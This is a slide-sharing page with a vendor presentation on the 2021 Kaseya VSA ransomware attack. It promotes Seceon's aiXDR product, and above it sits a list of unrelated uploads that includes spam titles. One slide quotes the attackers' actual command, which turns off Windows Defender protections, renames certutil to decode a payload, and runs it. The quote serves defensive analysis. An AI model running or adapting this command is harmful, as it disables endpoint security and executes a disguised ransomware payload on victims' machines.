Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
SOFTTECHHUB
 
Helen Lubchak: Тренди в управлінні проєктами та miltech (UA)
Helen Lubchak: Тренди в управлінні проєктами та miltech (UA)Helen Lubchak: Тренди в управлінні проєктами та miltech (UA)
Helen Lubchak: Тренди в управлінні проєктами та miltech (UA)
Lviv Startup Club
 
Tata Group Dials Taiwan for Its Chipmaking Ambition in Gujarat’s Dholera
Tata Group Dials Taiwan for Its Chipmaking Ambition in Gujarat’s DholeraTata Group Dials Taiwan for Its Chipmaking Ambition in Gujarat’s Dholera
Tata Group Dials Taiwan for Its Chipmaking Ambition in Gujarat’s Dholera
Avirahi City Dholera
 
Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024
FelixPerez547899
 
Authentically Social by Corey Perlman - EO Puerto Rico
Authentically Social by Corey Perlman - EO Puerto RicoAuthentically Social by Corey Perlman - EO Puerto Rico
Authentically Social by Corey Perlman - EO Puerto Rico
Corey Perlman, Social Media Speaker and Consultant
 
Chapter 7 Final business management sciences .ppt
Chapter 7 Final business management sciences .pptChapter 7 Final business management sciences .ppt
Chapter 7 Final business management sciences .ppt
ssuser567e2d
 
3.0 Project 2_ Developing My Brand Identity Kit.pptx
3.0 Project 2_ Developing My Brand Identity Kit.pptx3.0 Project 2_ Developing My Brand Identity Kit.pptx
3.0 Project 2_ Developing My Brand Identity Kit.pptx
tanyjahb
 
The Influence of Marketing Strategy and Market Competition on Business Perfor...
The Influence of Marketing Strategy and Market Competition on Business Perfor...The Influence of Marketing Strategy and Market Competition on Business Perfor...
The Influence of Marketing Strategy and Market Competition on Business Perfor...
Adam Smith
 
ikea_woodgreen_petscharity_dog-alogue_digital.pdf
ikea_woodgreen_petscharity_dog-alogue_digital.pdfikea_woodgreen_petscharity_dog-alogue_digital.pdf
ikea_woodgreen_petscharity_dog-alogue_digital.pdf
agatadrynko
 
buy old yahoo accounts buy yahoo accounts
buy old yahoo accounts buy yahoo accountsbuy old yahoo accounts buy yahoo accounts
buy old yahoo accounts buy yahoo accounts
Susan Laney
 

Recently uploaded (20)

Top mailing list providers in the USA.pptx
Top mailing list providers in the USA.pptxTop mailing list providers in the USA.pptx
Top mailing list providers in the USA.pptx
 
Building Your Employer Brand with Social Media
Building Your Employer Brand with Social MediaBuilding Your Employer Brand with Social Media
Building Your Employer Brand with Social Media
 
In the Adani-Hindenburg case, what is SEBI investigating.pptx
In the Adani-Hindenburg case, what is SEBI investigating.pptxIn the Adani-Hindenburg case, what is SEBI investigating.pptx
In the Adani-Hindenburg case, what is SEBI investigating.pptx
 
Digital Transformation and IT Strategy Toolkit and Templates
Digital Transformation and IT Strategy Toolkit and TemplatesDigital Transformation and IT Strategy Toolkit and Templates
Digital Transformation and IT Strategy Toolkit and Templates
 
Call 8867766396 Satta Matka Dpboss Matka Guessing Satta batta Matka 420 Satta...
Call 8867766396 Satta Matka Dpboss Matka Guessing Satta batta Matka 420 Satta...Call 8867766396 Satta Matka Dpboss Matka Guessing Satta batta Matka 420 Satta...
Call 8867766396 Satta Matka Dpboss Matka Guessing Satta batta Matka 420 Satta...
 
Creative Web Design Company in Singapore
Creative Web Design Company in SingaporeCreative Web Design Company in Singapore
Creative Web Design Company in Singapore
 
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challengesEvent Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
 
Observation Lab PowerPoint Assignment for TEM 431
Observation Lab PowerPoint Assignment for TEM 431Observation Lab PowerPoint Assignment for TEM 431
Observation Lab PowerPoint Assignment for TEM 431
 
Understanding User Needs and Satisfying Them
Understanding User Needs and Satisfying ThemUnderstanding User Needs and Satisfying Them
Understanding User Needs and Satisfying Them
 
Auditing study material for b.com final year students
Auditing study material for b.com final year studentsAuditing study material for b.com final year students
Auditing study material for b.com final year students
 
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
 
Helen Lubchak: Тренди в управлінні проєктами та miltech (UA)
Helen Lubchak: Тренди в управлінні проєктами та miltech (UA)Helen Lubchak: Тренди в управлінні проєктами та miltech (UA)
Helen Lubchak: Тренди в управлінні проєктами та miltech (UA)
 
Tata Group Dials Taiwan for Its Chipmaking Ambition in Gujarat’s Dholera
Tata Group Dials Taiwan for Its Chipmaking Ambition in Gujarat’s DholeraTata Group Dials Taiwan for Its Chipmaking Ambition in Gujarat’s Dholera
Tata Group Dials Taiwan for Its Chipmaking Ambition in Gujarat’s Dholera
 
Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024
 
Authentically Social by Corey Perlman - EO Puerto Rico
Authentically Social by Corey Perlman - EO Puerto RicoAuthentically Social by Corey Perlman - EO Puerto Rico
Authentically Social by Corey Perlman - EO Puerto Rico
 
Chapter 7 Final business management sciences .ppt
Chapter 7 Final business management sciences .pptChapter 7 Final business management sciences .ppt
Chapter 7 Final business management sciences .ppt
 
3.0 Project 2_ Developing My Brand Identity Kit.pptx
3.0 Project 2_ Developing My Brand Identity Kit.pptx3.0 Project 2_ Developing My Brand Identity Kit.pptx
3.0 Project 2_ Developing My Brand Identity Kit.pptx
 
The Influence of Marketing Strategy and Market Competition on Business Perfor...
The Influence of Marketing Strategy and Market Competition on Business Perfor...The Influence of Marketing Strategy and Market Competition on Business Perfor...
The Influence of Marketing Strategy and Market Competition on Business Perfor...
 
ikea_woodgreen_petscharity_dog-alogue_digital.pdf
ikea_woodgreen_petscharity_dog-alogue_digital.pdfikea_woodgreen_petscharity_dog-alogue_digital.pdf
ikea_woodgreen_petscharity_dog-alogue_digital.pdf
 
buy old yahoo accounts buy yahoo accounts
buy old yahoo accounts buy yahoo accountsbuy old yahoo accounts buy yahoo accounts
buy old yahoo accounts buy yahoo accounts
 

How Seceon could have stopped the Ransomware roll over Kaseya.pptx

  • 1. How Seceon could have stopped the Ransomware roll over Kaseya. The attack and ways will keep on changing, one of the most Recent attack that Kaseya faced is the result of what & where industry is missing in terms of Cybersecurity. The attack on Kaseya came in action a few days ago. The sudden attack emerged in a brutal way infecting around 1500 businesses worldwide as per the statement by Kaseya’s CEO. The names of infected companies are not yet out. The observed result of this attackswas seen with Swedish Coop supermarket which was forced to close. They are among one of the clients of these MSPs which were hacked and got infected with 2100 endpoints.
  • 2. A $70 millions ransom was demanded for data backup. The REvil Ransomware gang is being considered responsible for this operation. It’s still a mystery whether REvil prepared this attack themselves or it was from any of their associates. Kaseya has been completely forced to shut down their cloud infrastructure to stop malicious updates from spreading and they completely advised their customer to power down their servers and that’s created a lot of chaos. What is VSA, How it got compromised and Ransomware rolled over it.. VSA is a remote monitoring tool, a kind of remote access tool or RAT that allows to have the complete access of system or device it’s installed on, which helps IT Technicians to diagnose and fix problems remotely. Every organization doesn’t have resources to manage their infrastructure in house, so they outsource this as a task to MSP (Managed Service Provider). These MSPs often manage the system of hundreds of companies simultaneously. Kaseya is an MSP provider with VSA as a product it has its own prem version, which is run by the customer in their environment, this is typically needed by MSPs to manage all their client system and this was something that was off with Kaseya server that was used to manage lot of their clients. Having the access of this server will itself allow it to have the access of all clients associated with it. And this how it was compromised at initial. Soon after the attack rolled out all the VSA Server were advised to close. The operation was huge enough to infect the business, it was the mass ransomware unlike the ransomware that we know usually where organizations get infected with Ransomware and all system they get encrypt and are ask for ransom, here case was quite different where 100’s of organization around the world got encrypted simultaneously with the same ransomware campaign which was tunnelled during the software update in Kaseya, since from the inception it moved in a supply chain attack. It was a kind of compromise of Kaseya which was operated on VSA
  • 3. server rather than any of their directory directly that we usually see in Ransomware. The VSA server was used to ransomware a lot of organizations in single click and this is what has happened at high level in it. How does it propagate? The scenario is like If there is a device using Kaseya’s agent to monitor all the device subjected to policy and that is connected to central server and that server is affected then the entire system connected with it is at higher risk, and this is how it propagated in the form of chain attack one after the other and affected 1000s of server. How did the initial compromise begin and aiXDR detection? As VSA server vulnerability was exploited, Seceon aiXDR can detect and remediate exploited vulnerabilities and zero day attack in very early stages. Here is the steps by steps analysis: 1.aiXDR monitors all inbound and outbound connections and in this case aiXDR should have detected a connection from Blacklisted IPs or from a prohibited country and automatically blocked that connection. 2.Once connection was made it was trying to download/upload agent.exe on the host , aiXDR can detect data exfiltration and in this case aiXDR should have blocked that connection so it can not download the agent.exe or transfers the data to external hosts. 3.Also when the host had agent.exe downloaded, it was doing a different type of scan to get access to another host – aiXDR should have detected those scans and automatically quarantined that host so it can not infect other hosts. 4.Following PowerShell command was launched by the C:Program Files (x86)Kaseya<ID>AgentMon.exe file of the Kaseya VSA platform. “C:WINDOWSsystem32cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:WindowsSystem32WindowsPowerShellv1.0powershell.exe Set- MpPreference
  • 4. -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:WindowsSystem32certutil.exe C:Windowscert.exe & echo %RANDOM% >> C:Windowscert.exe & C:Windowscert.exe -decode c:kworkingagent.crt c:kworkingagent.exe & del /q /f c:kworkingagent.crt C:Windowscert.exe & c:kworkingagent.exe 5.As the AgentMon.exe starts its 1st process to execute the powershell command the aiXDR would have detected a new process started as AgentMon.exe from C:Program Files (x86)Kaseya 6.aiXDR detects if any protection service is disabled on the host as we can see in this case they were trying to disable protection services 7.aiXDR detects if any process is renamed as Masquerading as we can see in this case certutil.exe was renamed as cert.exe . What was the impact of this? The threat actor was able to manage execution of code that enabled them to search scripts that linked with Kaseya’s application to pull out certain procedures or agent updates. It was part of the functionality of the application to push out procedures through all managed agents. These agents run on the computer which is managed by this solution. They simply run the script to all managed clients and that triggered a file copy and execution of script to all managed clients. This is how they ended by infecting all these systems. There were a couple of steps that were initiated step by step to make a complete successful attempt for attack but surprisingly it was never looked at and detected in between.
  • 5. Approach after Infected ? There are always different indicators left on the system to know how it’s being compromised or not, here in this case it has been identified that logs have been cleared at multiple stages. The logs were gone and other types of logs inside the application database itself were deleted but still some logs were there to know what VSA server has put out to manage clients. These logs became a point to bring out the investigation of how the system was targeted from the VSA server. Few indications of Being Ransomware. Ransomware is coming out as a complete business model and the threat actors are making a lot of money out of it. Below are few indications mentioned below: • All files in the system get encrypted and left with a README file saying about ransom amount. It will change the file extension which is a clear indication of attack occurrence. • Some of the files they may or may not get encrypted this happen in the case where ransomware did not execute successfully i.e it gets executed partially. • Provisional execution that disables antivirus functionality such as Windows defender or other security layers. Brief About Seceon aiXDR Seceon aiXDR is highly effective, enriched with capability of machine learning, AI, Big data, Dynamic threat intel, strong correlation and in-depth analysis which easily allows to cut & throw the threat roots at very initial stage. The solution detects the threat origin whether it’s coming from Network, application, host or machine learning. It comes out with one of the most interesting feature to show anything and everything that was done to make the attack attempt and how Seceon solution stopped the way in between to make the
  • 6. ... environment secure with 360 degree Comprehensive visibility, Proactive Threat Detection, Auto stopping of Threat and breaches in Real time. The customer should always make sure that they are not just taking a solution which is problem specific, the solution should always be capable of saving the environment from all kinds of threat and malicious activity whether it is known or unknown. The Seceon aiXDR is a single all-in-one platform. That helps to eliminate the use of silos based solutions and delivers the effective essential result in Comprehensive manner. Diag. show the Seceon aiXDR approach “Continuous real-time Monitoring, proactive Detection & auto Stop threats and breaches” Best Cybersecurity ROI.
  • 7. Contact Us Address -238 Littleton Road, Suite #206,Westford, MA 01886, USA Phone Number - +1 (978)-923-0040 Email Id - sales@seceon.com , info@seceon.com Website - https://www.seceon.com/ Twitter - https://twitter.com/Seceon_Inc